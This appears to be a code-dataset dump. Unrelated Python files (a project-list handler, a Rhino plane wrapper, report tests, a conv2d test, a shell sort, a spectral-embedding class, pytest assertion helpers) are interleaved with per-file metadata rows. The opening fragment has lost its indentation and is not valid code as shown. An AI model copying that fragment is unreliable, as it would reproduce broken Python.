starred_project_ids = {p.project_id for p in starred_projects}
# A dict of project id to the user's membership status.
project_memberships = {}
if mr.auth.user_id:
with work_env.WorkEnv(mr, self.services) as we:
owned, _archive_owned, member_of, contrib_of = (
we.GetUserProjects(mr.auth.effective_ids))
project_memberships.update({proj.project_id: 'Owner' for proj in owned})
project_memberships.update(
{proj.project_id: 'Member' for proj in member_of})
project_memberships.update(
{proj.project_id: 'Contributor' for proj in contrib_of})
# Finish the project search pipeline.
pipeline.SearchForIDs(domain=mr.request.host)
pipeline.GetProjectsAndPaginate(mr.cnxn, urls.HOSTING_HOME)
project_ids = [p.project_id for p in pipeline.visible_results]
star_count_dict = self.services.project_star.CountItemsStars(
mr.cnxn, project_ids)
# Make ProjectView objects
project_view_list = [
project_views.ProjectView(
p, starred=p.project_id in starred_project_ids,
num_stars=star_count_dict.get(p.project_id),
membership_desc=project_memberships.get(p.project_id))
for p in pipeline.visible_results]
return {
'can_create_project': ezt.boolean(can_create_project),
'learn_more_link': settings.learn_more_link,
'projects': project_view_list,
'pagination': pipeline.pagination,
}
def _MaybeRedirectToDomainDefaultProject(self, mr):
"""If there is a relevant default project, redirect to it."""
project_name = settings.domain_to_default_project.get(mr.request.host)
if not project_name:
return 'No configured default project redirect for this domain.'
project = None
try:
project = self.services.project.GetProjectByName(mr.cnxn, project_name)
except exceptions.NoSuchProjectException:
pass
if not project:
return 'Domain default project %s not found' % project_name
if not permissions.UserCanViewProject(
mr.auth.user_pb, mr.auth.effective_ids, project):
return 'User cannot view default project: %r' % project
project_url = '/p/%s' % project_name
self.redirect(project_url, abort=True)
return 'Redirected to %r' % project_url
| 36.62037
| 78
| 0.733502
|
4a0a48445aba68d00888a8e2ebb082177903377e
| 3,462
|
py
|
Python
|
src/compas_rhino/geometry/plane.py
|
arpastrana/compas
|
ed677a162c14dbe562c82d72f370279259faf7da
|
[
"MIT"
] | null | null | null |
src/compas_rhino/geometry/plane.py
|
arpastrana/compas
|
ed677a162c14dbe562c82d72f370279259faf7da
|
[
"MIT"
] | null | null | null |
src/compas_rhino/geometry/plane.py
|
arpastrana/compas
|
ed677a162c14dbe562c82d72f370279259faf7da
|
[
"MIT"
] | null | null | null |
from __future__ import print_function
from __future__ import absolute_import
from __future__ import division
import compas
from compas.geometry import Plane
from compas.geometry import Frame
from compas_rhino.geometry.base import BaseRhinoGeometry
if compas.RHINO:
import Rhino
__all__ = ['RhinoPlane']
class RhinoPlane(BaseRhinoGeometry):
"""Wrapper for a Rhino plane objects.
Attributes
----------
point (read-only) : :class:`Rhino.Geometry.Point3d`
Base point of the plane.
normal (read-only) : :class:`Rhino.Geometry.Vector3d`
The normal vector of the plane.
xaxis (read-only) : :class:`Rhino.Geometry.Vector3d`
The X axis of the plane.
yaxis (read-only) : :class:`Rhino.Geometry.Vector3d`
The Y axis of the plane.
Notes
-----
In Rhino, a plane and a frame are equivalent.
Therefore, the COMPAS conversion function of this class returns a frame object instead of a plane.
"""
def __init__(self):
super(RhinoPlane, self).__init__()
@property
def point(self):
return self.geometry.Origin
@property
def normal(self):
return self.geometry.Normal
@property
def xaxis(self):
return self.geometry.XAxis
@property
def yaxis(self):
return self.geometry.YAxis
@classmethod
def from_geometry(cls, geometry):
"""Construct a plane wrapper from an existing geometry object.
Parameters
----------
geometry : tuple of point and normal or :class:`Rhino.Geometry.Plane` or :class:`compas.geometry.Plane` or :class:`compas.geometry.Frame`
The geometry object defining a plane.
Returns
-------
:class:`compas_rhino.geometry.RhinoPlane`
The wrapped plane.
"""
if not isinstance(geometry, Rhino.Geometry.Plane):
if isinstance(geometry, Plane):
point = Rhino.Geometry.Point3d(geometry[0][0], geometry[0][1], geometry[0][2])
normal = Rhino.Geometry.Vector3d(geometry[1][0], geometry[1][1], geometry[1][2])
geometry = Rhino.Geometry.Plane(point, normal)
elif isinstance(geometry, Frame):
point = Rhino.Geometry.Point3d(geometry[0][0], geometry[0][1], geometry[0][2])
xaxis = Rhino.Geometry.Vector3d(geometry[1][0], geometry[1][1], geometry[1][2])
yaxis = Rhino.Geometry.Vector3d(geometry[2][0], geometry[2][1], geometry[2][2])
geometry = Rhino.Geometry.Plane(point, xaxis, yaxis)
else:
point = Rhino.Geometry.Point3d(geometry[0][0], geometry[0][1], geometry[0][2])
normal = Rhino.Geometry.Vector3d(geometry[1][0], geometry[1][1], geometry[1][2])
geometry = Rhino.Geometry.Plane(point, normal)
line = cls()
line.geometry = geometry
return line
@classmethod
def from_selection(cls):
raise NotImplementedError
def to_compas(self):
"""Convert to a COMPAS geometry object.
Returns
-------
:class:`compas.geometry.Frame`
A COMPAS frame object.
"""
return Frame(self.point, self.xaxis, self.yaxis)
# ==============================================================================
# Main
# ==============================================================================
if __name__ == '__main__':
pass
| 31.472727
| 145
| 0.591854
|
4a0a4910f6f84268ddb16877548ff314a9a81d09
| 560
|
py
|
Python
|
developement_code/get_short_train_data.py
|
darongliu/Input_Method
|
28055937fc777cbba8cbc4c87ba5a2670da7d4e2
|
[
"MIT"
] | 1
|
2018-07-03T07:42:42.000Z
|
2018-07-03T07:42:42.000Z
|
developement_code/get_short_train_data.py
|
darongliu/Input_Method
|
28055937fc777cbba8cbc4c87ba5a2670da7d4e2
|
[
"MIT"
] | null | null | null |
developement_code/get_short_train_data.py
|
darongliu/Input_Method
|
28055937fc777cbba8cbc4c87ba5a2670da7d4e2
|
[
"MIT"
] | null | null | null |
import os
data_root = "../data"
origin_file = os.path.join(data_root , "all_chinese_char_seperate_train.ptt.corpus.20140906.txt")
save_file = os.path.join(data_root , "all_chinese_char_seperate_train_short.ptt.corpus.20140906.txt")
with open(origin_file , 'r') as f_read , open(save_file , 'w') as f_save :
alllines = f_read.readlines()
for line in alllines:
words = line.split()
if len(words) < 20 :
for word in words:
f_save.write(word)
f_save.write(" ")
f_save.write("\n")
| 32.941176
| 101
| 0.633929
|
4a0a493d3448f996eea0873ddc011de1d911fc04
| 5,511
|
py
|
Python
|
corehq/apps/reports/tests/test_sql_reports.py
|
satyaakam/commcare-hq
|
233f255ff20ab3a16013e9fdfdb9c1dcf632e415
|
[
"BSD-3-Clause"
] | null | null | null |
corehq/apps/reports/tests/test_sql_reports.py
|
satyaakam/commcare-hq
|
233f255ff20ab3a16013e9fdfdb9c1dcf632e415
|
[
"BSD-3-Clause"
] | 1
|
2021-06-02T04:45:16.000Z
|
2021-06-02T04:45:16.000Z
|
corehq/apps/reports/tests/test_sql_reports.py
|
satyaakam/commcare-hq
|
233f255ff20ab3a16013e9fdfdb9c1dcf632e415
|
[
"BSD-3-Clause"
] | null | null | null |
from datetime import datetime, time
from django import test as unittest
from django.test.client import RequestFactory
from dimagi.utils.dates import DateSpan
from corehq.apps.domain.shortcuts import create_domain
from corehq.apps.users.models import WebUser
from corehq.sql_db.connections import Session
from corehq.util.dates import iso_string_to_date
from corehq.util.test_utils import softer_assert
from .sql_fixture import load_data
from .sql_reports import RegionTestReport, UserTestReport, test_report
DOMAIN = "test"
class BaseReportTest(unittest.TestCase):
@classmethod
def setUpClass(cls):
super(BaseReportTest, cls).setUpClass()
load_data()
create_domain(DOMAIN)
cls.couch_user = WebUser.create(None, "report_test", "foobar")
cls.couch_user.add_domain_membership(DOMAIN, is_admin=True)
cls.couch_user.save()
cls.factory = RequestFactory()
@classmethod
def tearDownClass(cls):
cls.couch_user.delete()
Session.remove()
super(BaseReportTest, cls).tearDownClass()
def _get_report_data(self, report, startdate, enddate):
req = self._get_request(startdate, enddate)
rep = report(req, in_testing=True)
json = rep.json_dict['aaData']
html_data, sort_data = [], []
for row in json:
html_row, sort_row = [], []
for val in row:
if isinstance(val, dict):
html_row.append(val["html"])
sort_row.append(val["sort_key"])
else:
html_row.append(val)
sort_row.append(val)
html_data.append(html_row)
sort_data.append(sort_row)
return html_data, sort_data
def _get_request(self, startdate, enddate):
request = self.factory.get('/')
request.couch_user = self.couch_user
request.datespan = DateSpan(self.date(startdate), self.date(enddate))
return request
def date(self, d):
return datetime.combine(iso_string_to_date(d), time())
class SimpleReportTest(BaseReportTest):
@softer_assert("to add back post https://github.com/dimagi/sql-agg/pull/56")
def test_no_group_no_filter(self):
html_data, sort_data = self._get_report_data(test_report(UserTestReport), "2013-01-01", "2013-02-01")
self.assertEqual(len(sort_data), 1)
self.assertEqual(sort_data[0], [2, 2, 66])
@softer_assert("to add back post https://github.com/dimagi/sql-agg/pull/56")
def test_no_group_with_filter(self):
filters = ["date > :startdate"]
report = test_report(UserTestReport, filters=filters)
html_data, sort_data = self._get_report_data(report, "2013-01-01", "2013-02-01")
self.assertEqual(len(sort_data), 1)
self.assertEqual(sort_data[0], [1, 1, 66])
def test_with_group_no_filter(self):
keys = [["user1"], ["user2"]] # specify keys to guarantee ordering
report = test_report(UserTestReport, keys=keys, group_by=['user'])
html_data, sort_data = self._get_report_data(report, "2013-01-01", "2013-02-01")
self.assertEqual(len(sort_data), 2)
self.assertEqual(sort_data[0], ['Joe', 1, 1, 100])
self.assertEqual(sort_data[1], ['Bob', 1, 1, 50])
def test_with_group_with_filter(self):
keys = [["user1"], ["user2"]] # specify keys to guarantee ordering
filters = ["date > :startdate"]
report = test_report(UserTestReport, keys=keys, filters=filters, group_by=['user'])
html_data, sort_data = self._get_report_data(report, "2013-01-01", "2013-02-01")
self.assertEqual(len(sort_data), 2)
self.assertEqual(sort_data[0], ['Joe', 0, 1, 100])
self.assertEqual(sort_data[1], ['Bob', 1, 0, 50])
def test_extra_keys(self):
keys = [["user1"], ["user2"], ["user3"]]
report = test_report(UserTestReport, keys=keys, group_by=['user'])
html_data, sort_data = self._get_report_data(report, "2013-01-01", "2013-02-01")
self.assertEqual(len(sort_data), 3)
self.assertEqual(sort_data[0], ['Joe', 1, 1, 100])
self.assertEqual(sort_data[1], ['Bob', 1, 1, 50])
self.assertEqual(sort_data[2], ['Gill', '--', '--', '--'])
def test_formatting(self):
keys = [["user1"], ["user2"]]
report = test_report(UserTestReport, keys=keys, group_by=['user'])
html_data, sort_data = self._get_report_data(report, "2013-01-01", "2013-02-01")
self.assertEqual(len(sort_data), 2)
self.assertEqual(html_data[0], ['Joe', 1, 1, "100%"])
self.assertEqual(html_data[1], ['Bob', 1, 1, "50%"])
self.assertEqual(sort_data[0], ['Joe', 1, 1, 100])
self.assertEqual(sort_data[1], ['Bob', 1, 1, 50])
def test_multi_level_grouping(self):
keys = [
["region1", "region1_a"], ["region1", "region1_b"],
["region2", "region2_a"], ["region2", "region2_b"]
]
report = test_report(RegionTestReport, keys=keys, group_by=["region", "sub_region"])
html_data, sort_data = self._get_report_data(report, "2013-01-01", "2013-02-01")
self.assertEqual(len(sort_data), 4)
self.assertEqual(sort_data[0], ['Cape Town', 'Ronderbosch', 2, 1])
self.assertEqual(sort_data[1], ['Cape Town', 'Newlands', 0, 1])
self.assertEqual(sort_data[2], ['Durban', 'Glenwood', 1, 2])
self.assertEqual(sort_data[3], ['Durban', 'Morningside', 1, 0])
| 41.43609
| 109
| 0.636727
|
4a0a493e80a75f82d4597ff9c4be7afbfc45c000
| 2,218
|
py
|
Python
|
starthinker/task/dcm_api/schema/floodlightActivityPublisherDynamicTag.py
|
viohman/starthinker
|
20bd2d7fd1e541eb8a2c9b7159941f667e22e38e
|
[
"Apache-2.0"
] | null | null | null |
starthinker/task/dcm_api/schema/floodlightActivityPublisherDynamicTag.py
|
viohman/starthinker
|
20bd2d7fd1e541eb8a2c9b7159941f667e22e38e
|
[
"Apache-2.0"
] | 6
|
2021-03-19T12:00:18.000Z
|
2022-02-10T09:43:42.000Z
|
starthinker/task/dcm_api/schema/floodlightActivityPublisherDynamicTag.py
|
viohman/starthinker
|
20bd2d7fd1e541eb8a2c9b7159941f667e22e38e
|
[
"Apache-2.0"
] | null | null | null |
###########################################################################
#
# Copyright 2019 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
###########################################################################
floodlightActivityPublisherDynamicTag_Schema = [
{
"name": "clickThrough",
"type": "BOOLEAN",
"mode": "NULLABLE"
},
{
"description": "",
"name": "directorySiteId",
"type": "INT64",
"mode": "NULLABLE"
},
[
{
"description": "",
"name": "id",
"type": "INT64",
"mode": "NULLABLE"
},
{
"description": "",
"name": "name",
"type": "STRING",
"mode": "NULLABLE"
},
{
"description": "",
"name": "tag",
"type": "STRING",
"mode": "NULLABLE"
}
],
{
"description": "",
"name": "siteId",
"type": "INT64",
"mode": "NULLABLE"
},
[
{
"description": "",
"name": "dimensionName",
"type": "STRING",
"mode": "NULLABLE"
},
{
"description": "",
"name": "etag",
"type": "STRING",
"mode": "NULLABLE"
},
{
"description": "",
"name": "id",
"type": "STRING",
"mode": "NULLABLE"
},
{
"description": "",
"name": "kind",
"type": "STRING",
"mode": "NULLABLE"
},
{
"description": "BEGINS_WITH, CONTAINS, EXACT, WILDCARD_EXPRESSION",
"name": "matchType",
"type": "STRING",
"mode": "NULLABLE"
},
{
"description": "",
"name": "value",
"type": "STRING",
"mode": "NULLABLE"
}
],
{
"name": "viewThrough",
"type": "BOOLEAN",
"mode": "NULLABLE"
}
]
| 21.960396
| 75
| 0.48422
|
4a0a4973c5651f17e7d54c318ede70e5c832dbe6
| 5,198
|
py
|
Python
|
test/test_conv2d.py
|
wavecomp/waveext
|
ef7da7f751d565c160f4e6fbaa71b6ef256702cd
|
[
"Apache-2.0"
] | 3
|
2018-07-27T13:14:49.000Z
|
2019-05-13T21:25:16.000Z
|
test/test_conv2d.py
|
kshiring/waveext
|
ef7da7f751d565c160f4e6fbaa71b6ef256702cd
|
[
"Apache-2.0"
] | 1
|
2018-07-20T18:59:58.000Z
|
2018-07-20T18:59:58.000Z
|
test/test_conv2d.py
|
kshiring/waveext
|
ef7da7f751d565c160f4e6fbaa71b6ef256702cd
|
[
"Apache-2.0"
] | 2
|
2018-07-20T18:50:26.000Z
|
2019-04-02T11:45:18.000Z
|
#!/usr/bin/env python3
# test_conv2d.py
#
# Copyright (c) 2010-2018 Wave Computing, Inc. and its applicable licensors.
# All rights reserved; provided, that any files identified as open source shall
# be governed by the specific open source license(s) applicable to such files.
#
# For any files associated with distributions under the Apache 2.0 license,
# full attribution to The Apache Software Foundation is given via the license
# below.
#
# PURPOSE
# Unit test for FP Conv2D
#
# Author : Ken Shiring
# Created On : 02/26/2018
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import tensorflow as tf
import progressbar as pb
import waveflow
def compare_tensor(z1, z2, msg):
''' Run a compare on 2 tensors for equality. Report failure details.
'''
# assert z1.shape == z2.shape, msg
if z1.shape != z2.shape:
print(msg)
print("z1 shape: %s, z2 shape: %s" % (str(z1.shape), str(z2.shape)))
return False
rtol = 1e-4
if not np.allclose(z1, z2, atol=rtol):
print("\n\n")
d = ~np.isclose(z1, z2, atol=rtol)
print("z1 mismatch: %s" % (z1[d]))
print("z2 mismatch: %s" % (z2[d]))
print("at: %s" % (str(np.where(d))))
print("Failure: %s" % (msg))
return False
return True
def conv2d_test(config, t_init, i, p, activations, c2d_wts, stride, padding):
with tf.Session('', config=config) as sess:
t_init.run()
# print("Wave Kernel (NN):\n-------------------------------------------------")
z_op = waveflow.wavecomp_ops_module.wave_conv2d(activations, c2d_wts, strides=[1, stride, stride, 1], padding=padding)
# Base tensorflow. Only supports NHWC.
z2_op = tf.nn.conv2d(activations, c2d_wts,
strides=[1, stride, stride, 1], padding=padding, data_format='NHWC', use_cudnn_on_gpu=False)
z, z2, act_val, wts_val = sess.run([z_op, z2_op, activations, c2d_wts])
# print("\nTF:\n-------------------------------------------------")
assert_str = "Failure on i: %d, mode: SAME, params: %s" % (i, str(p))
if not compare_tensor(z, z2, assert_str):
print("activations: %s" % (act_val))
print("c2d_wts: %s" % (wts_val))
print("\n\n")
assert False
def test_conv2d():
''' Run tests on the Wave custom conv2d operator.
'''
tf.reset_default_graph()
# Turn off graph-rewriting optimizations
config = tf.ConfigProto(graph_options=tf.GraphOptions(optimizer_options=tf.OptimizerOptions(opt_level=tf.OptimizerOptions.L0)))
iterations = 10
widgets = ["conv2d tests: ", pb.Percentage(), ' ', pb.Bar(), ' ', pb.ETA()]
pbar = pb.ProgressBar(widgets=widgets, maxval=iterations)
pbar.start()
# Interesting kernel variants to cycle through
kernel_params = [
{'t_n':100, 't_ci':1, 't_co':32, 't_h':28, 't_w':28, 'w_k':5},
{'t_n':4, 't_ci':32, 't_co':32, 't_h':15, 't_w':15, 'w_k':3},
{'t_n':1, 't_ci':4, 't_co':64, 't_h':16, 't_w':16, 'w_k':3},
{'t_n':128, 't_ci':64, 't_co':128, 't_h':7, 't_w':7, 'w_k':5},
{'t_n':4, 't_ci':8, 't_co':4, 't_h':224, 't_w':224, 'w_k':7},
{'t_n':100, 't_ci':1, 't_co':32, 't_h':28, 't_w':28, 'w_k':1},
{'t_n':1, 't_ci':1, 't_co':2, 't_h':4, 't_w':4, 'w_k':1}
]
for i in range(iterations):
pbar.update(i)
tf.reset_default_graph()
# NCHW
p = kernel_params[i % len(kernel_params)]
t_n = p['t_n']
t_ci = p['t_ci']
t_co = p['t_co']
t_h = p['t_h']
t_w = p['t_w']
w_k = p['w_k']
# N H W C
activations = tf.get_variable("a", [t_n, t_h, t_w, t_ci], dtype=tf.float32, initializer=tf.truncated_normal_initializer(stddev=0.1))
# K K Ci Co
c2d_wts = tf.get_variable("b", [w_k, w_k, t_ci, t_co], dtype=tf.float32, initializer=tf.truncated_normal_initializer(stddev=0.1))
t_init = tf.global_variables_initializer()
# SAME variant, stride = 1
conv2d_test(config, t_init, i, p, activations, c2d_wts, stride=1, padding='SAME')
# Valid variant, stride = 1
conv2d_test(config, t_init, i, p, activations, c2d_wts, stride=1, padding='VALID')
# SAME variant, stride = 2
# conv2d_test(config, t_init, i, p, activations, c2d_wts, stride=2, padding='SAME')
# Valid variant, stride = 2
conv2d_test(config, t_init, i, p, activations, c2d_wts, stride=2, padding='VALID')
pbar.finish()
return True
if __name__ == "__main__":
test_conv2d()
| 34.885906
| 141
| 0.595614
|
4a0a49c64b8effeb3ed7381ae68cdfe219b4001c
| 364
|
py
|
Python
|
10.ShellSort.py
|
sarincr/Data-Structure-Algorithms-In-Python
|
80443ddb67f889b1d6c41d46da40d651441b911e
|
[
"MIT"
] | null | null | null |
10.ShellSort.py
|
sarincr/Data-Structure-Algorithms-In-Python
|
80443ddb67f889b1d6c41d46da40d651441b911e
|
[
"MIT"
] | null | null | null |
10.ShellSort.py
|
sarincr/Data-Structure-Algorithms-In-Python
|
80443ddb67f889b1d6c41d46da40d651441b911e
|
[
"MIT"
] | 1
|
2021-07-06T19:14:11.000Z
|
2021-07-06T19:14:11.000Z
|
def ShellSort(lst, n):
h = n // 2
while h > 0:
for i in range(h, n):
t = lst[i]
j = i
while j >= h and lst[j - h] > t:
lst[j] = lst[j - h]
j -= h
lst[j] = t
h = h // 2
lst = [4,9,6,8,5,2,10,7,1,3]
n = len(lst)
print('Array before Sorting:')
print(lst)
ShellSort(lst, n)
print('Array after Sorting:')
print(lst)
| 18.2
| 38
| 0.483516
|
4a0a4c49d69bf30bc078b9962598132810ff2273
| 7,502
|
py
|
Python
|
graspologic/embed/lse.py
|
j1c/graspologic
|
ff34382d1ffa0b7ea5f0e005525b7364f977e86f
|
[
"MIT"
] | 110
|
2018-09-18T15:33:38.000Z
|
2020-09-12T20:12:09.000Z
|
graspologic/embed/lse.py
|
j1c/graspologic
|
ff34382d1ffa0b7ea5f0e005525b7364f977e86f
|
[
"MIT"
] | 431
|
2018-09-18T21:03:12.000Z
|
2020-09-15T05:42:04.000Z
|
graspologic/embed/lse.py
|
j1c/graspologic
|
ff34382d1ffa0b7ea5f0e005525b7364f977e86f
|
[
"MIT"
] | 47
|
2018-09-28T11:34:45.000Z
|
2020-09-08T11:34:30.000Z
|
# Copyright (c) Microsoft Corporation and contributors.
# Licensed under the MIT License.
from typing import Any, Optional, Union
import networkx as nx
import numpy as np
from ..types import GraphRepresentation
from ..utils import LaplacianFormType, to_laplacian
from .base import BaseSpectralEmbed, SvdAlgorithmType
class LaplacianSpectralEmbed(BaseSpectralEmbed):
r"""
Class for computing the laplacian spectral embedding of a graph.
The laplacian spectral embedding (LSE) is a k-dimensional Euclidean representation
of the graph based on its Laplacian matrix. It relies on an SVD to reduce
the dimensionality to the specified ``n_components``, or if ``n_components`` is
unspecified, can find a number of dimensions automatically.
Parameters
----------
form : {'DAD' (default), 'I-DAD', 'R-DAD'}, optional
Specifies the type of Laplacian normalization to use. See
:func:`~graspologic.utils.to_laplacian` for more details regarding form.
n_components : int or None, default = None
Desired dimensionality of output data. If "full",
``n_components`` must be ``<= min(X.shape)``. Otherwise, ``n_components`` must be
``< min(X.shape)``. If None, then optimal dimensions will be chosen by
:func:`~graspologic.embed.select_dimension` using ``n_elbows`` argument.
n_elbows : int, optional, default: 2
If ``n_components`` is None, then compute the optimal embedding dimension using
:func:`~graspologic.embed.select_dimension`. Otherwise, ignored.
algorithm : {'randomized' (default), 'full', 'truncated'}, optional
SVD solver to use:
- 'randomized'
Computes randomized svd using
:func:`sklearn.utils.extmath.randomized_svd`
- 'full'
Computes full svd using :func:`scipy.linalg.svd`
- 'truncated'
Computes truncated svd using :func:`scipy.sparse.linalg.svds`
n_iter : int, optional (default = 5)
Number of iterations for randomized SVD solver. Not used by 'full' or
'truncated'. The default is larger than the default in randomized_svd
to handle sparse matrices that may have large slowly decaying spectrum.
check_lcc : bool , optional (defult = True)
Whether to check if input graph is connected. May result in non-optimal
results if the graph is unconnected. If True and input is unconnected,
a UserWarning is thrown. Not checking for connectedness may result in
faster computation.
regularizer: int, float or None, optional (default=None)
Constant to be added to the diagonal of degree matrix. If None, average
node degree is added. If int or float, must be >= 0. Only used when
``form`` is 'R-DAD'.
concat : bool, optional (default False)
If graph is directed, whether to concatenate left and right (out and in) latent
positions along axis 1.
Attributes
----------
n_features_in_: int
Number of features passed to the
:func:`~graspologic.embed.LaplacianSpectralEmbed.fit` method.
latent_left_ : array, shape (n_samples, n_components)
Estimated left latent positions of the graph.
latent_right_ : array, shape (n_samples, n_components), or None
Only computed when the graph is directed, or adjacency matrix is assymetric.
Estimated right latent positions of the graph. Otherwise, None.
singular_values_ : array, shape (n_components)
Singular values associated with the latent position matrices.
svd_seed : int or None (default ``None``)
Only applicable for ``algorithm="randomized"``; allows you to seed the
randomized svd solver for deterministic, albeit pseudo-randomized behavior.
See Also
--------
graspologic.embed.select_svd
graspologic.embed.select_dimension
graspologic.utils.to_laplacian
Notes
-----
The singular value decomposition:
.. math:: A = U \Sigma V^T
is used to find an orthonormal basis for a matrix, which in our case is the
Laplacian matrix of the graph. These basis vectors (in the matrices U or V) are
ordered according to the amount of variance they explain in the original matrix.
By selecting a subset of these basis vectors (through our choice of dimensionality
reduction) we can find a lower dimensional space in which to represent the graph.
References
----------
.. [1] Sussman, D.L., Tang, M., Fishkind, D.E., Priebe, C.E. "A
Consistent Adjacency Spectral Embedding for Stochastic Blockmodel Graphs,"
Journal of the American Statistical Association, Vol. 107(499), 2012.
.. [2] Von Luxburg, Ulrike. "A tutorial on spectral clustering," Statistics
and computing, Vol. 17(4), pp. 395-416, 2007.
.. [3] Rohe, Karl, Sourav Chatterjee, and Bin Yu. "Spectral clustering and
the high-dimensional stochastic blockmodel," The Annals of Statistics,
Vol. 39(4), pp. 1878-1915, 2011.
"""
def __init__(
self,
form: LaplacianFormType = "DAD",
n_components: Optional[int] = None,
n_elbows: Optional[int] = 2,
algorithm: SvdAlgorithmType = "randomized",
n_iter: int = 5,
check_lcc: bool = True,
regularizer: Optional[float] = None,
concat: bool = False,
svd_seed: Optional[int] = None,
):
super().__init__(
n_components=n_components,
n_elbows=n_elbows,
algorithm=algorithm,
n_iter=n_iter,
check_lcc=check_lcc,
concat=concat,
svd_seed=svd_seed,
)
self.form = form
self.regularizer = regularizer
def fit(
self,
graph: GraphRepresentation,
y: Optional[Any] = None,
*args: Any,
**kwargs: Any
) -> "LaplacianSpectralEmbed":
"""
Fit LSE model to input graph
By default, uses the Laplacian normalization of the form:
.. math:: L = D^{-1/2} A D^{-1/2}
Parameters
----------
graph : array-like, scipy.sparse.csr_matrix, or networkx.Graph
Input graph to embed. see graspologic.utils.import_graph
Returns
-------
self : object
Returns an instance of self.
"""
A = self._fit(graph)
L_norm = to_laplacian(A, form=self.form, regularizer=self.regularizer)
self._reduce_dim(L_norm)
self.is_fitted_ = True
return self
def _compute_oos_prediction(self, X, directed): # type: ignore
"""
Computes the out-of-sample latent position estimation.
Parameters
----------
X: np.ndarray
Input to do oos embedding on.
directed: bool
Indication if graph is directed or undirected
Returns
-------
out : array_like or tuple, shape
"""
if not directed:
if X.ndim == 1:
X = np.expand_dims(X, axis=0)
return ((X @ self._pinv_left).T / np.sum(X, axis=1)).T
elif directed:
X_0 = X[0]
X_1 = X[1]
if X_0.ndim == 1:
X_0 = np.expand_dims(X_0, axis=0)
X_1 = np.expand_dims(X_1, axis=0)
return ((X_1 @ self._pinv_right).T / np.sum(X_1, axis=1)).T, (
(X_0 @ self._pinv_left).T / np.sum(X_0, axis=1)
).T
| 36.067308
| 89
| 0.632631
|
4a0a4e4310aa9f1758c20bdaa4b4a56c2f00d53b
| 10,761
|
py
|
Python
|
python2.7/site-packages/_pytest/assertion/util.py
|
84KaliPleXon3/sslstrip-hsts-openwrt
|
f875ded48078a3ed84bffef1e69dcbeaf2e77ae3
|
[
"MIT"
] | 1,323
|
2016-11-17T21:28:18.000Z
|
2022-03-31T17:42:37.000Z
|
python2.7/site-packages/_pytest/assertion/util.py
|
84KaliPleXon3/sslstrip-hsts-openwrt
|
f875ded48078a3ed84bffef1e69dcbeaf2e77ae3
|
[
"MIT"
] | 301
|
2017-01-02T17:49:13.000Z
|
2022-03-14T13:17:42.000Z
|
python2.7/site-packages/_pytest/assertion/util.py
|
84KaliPleXon3/sslstrip-hsts-openwrt
|
f875ded48078a3ed84bffef1e69dcbeaf2e77ae3
|
[
"MIT"
] | 131
|
2017-02-09T08:05:03.000Z
|
2022-03-15T06:44:34.000Z
|
"""Utilities for assertion debugging"""
import pprint
import _pytest._code
import py
try:
from collections import Sequence
except ImportError:
Sequence = list
BuiltinAssertionError = py.builtin.builtins.AssertionError
u = py.builtin._totext
# The _reprcompare attribute on the util module is used by the new assertion
# interpretation code and assertion rewriter to detect this plugin was
# loaded and in turn call the hooks defined here as part of the
# DebugInterpreter.
_reprcompare = None
# the re-encoding is needed for python2 repr
# with non-ascii characters (see issue 877 and 1379)
def ecu(s):
try:
return u(s, 'utf-8', 'replace')
except TypeError:
return s
def format_explanation(explanation):
"""This formats an explanation
Normally all embedded newlines are escaped, however there are
three exceptions: \n{, \n} and \n~. The first two are intended
cover nested explanations, see function and attribute explanations
for examples (.visit_Call(), visit_Attribute()). The last one is
for when one explanation needs to span multiple lines, e.g. when
displaying diffs.
"""
explanation = ecu(explanation)
lines = _split_explanation(explanation)
result = _format_lines(lines)
return u('\n').join(result)
def _split_explanation(explanation):
"""Return a list of individual lines in the explanation
This will return a list of lines split on '\n{', '\n}' and '\n~'.
Any other newlines will be escaped and appear in the line as the
literal '\n' characters.
"""
raw_lines = (explanation or u('')).split('\n')
lines = [raw_lines[0]]
for l in raw_lines[1:]:
if l and l[0] in ['{', '}', '~', '>']:
lines.append(l)
else:
lines[-1] += '\\n' + l
return lines
def _format_lines(lines):
"""Format the individual lines
This will replace the '{', '}' and '~' characters of our mini
formatting language with the proper 'where ...', 'and ...' and ' +
...' text, taking care of indentation along the way.
Return a list of formatted lines.
"""
result = lines[:1]
stack = [0]
stackcnt = [0]
for line in lines[1:]:
if line.startswith('{'):
if stackcnt[-1]:
s = u('and ')
else:
s = u('where ')
stack.append(len(result))
stackcnt[-1] += 1
stackcnt.append(0)
result.append(u(' +') + u(' ')*(len(stack)-1) + s + line[1:])
elif line.startswith('}'):
stack.pop()
stackcnt.pop()
result[stack[-1]] += line[1:]
else:
assert line[0] in ['~', '>']
stack[-1] += 1
indent = len(stack) if line.startswith('~') else len(stack) - 1
result.append(u(' ')*indent + line[1:])
assert len(stack) == 1
return result
# Provide basestring in python3
try:
basestring = basestring
except NameError:
basestring = str
def assertrepr_compare(config, op, left, right):
"""Return specialised explanations for some operators/operands"""
width = 80 - 15 - len(op) - 2 # 15 chars indentation, 1 space around op
left_repr = py.io.saferepr(left, maxsize=int(width//2))
right_repr = py.io.saferepr(right, maxsize=width-len(left_repr))
summary = u('%s %s %s') % (ecu(left_repr), op, ecu(right_repr))
issequence = lambda x: (isinstance(x, (list, tuple, Sequence)) and
not isinstance(x, basestring))
istext = lambda x: isinstance(x, basestring)
isdict = lambda x: isinstance(x, dict)
isset = lambda x: isinstance(x, (set, frozenset))
def isiterable(obj):
try:
iter(obj)
return not istext(obj)
except TypeError:
return False
verbose = config.getoption('verbose')
explanation = None
try:
if op == '==':
if istext(left) and istext(right):
explanation = _diff_text(left, right, verbose)
else:
if issequence(left) and issequence(right):
explanation = _compare_eq_sequence(left, right, verbose)
elif isset(left) and isset(right):
explanation = _compare_eq_set(left, right, verbose)
elif isdict(left) and isdict(right):
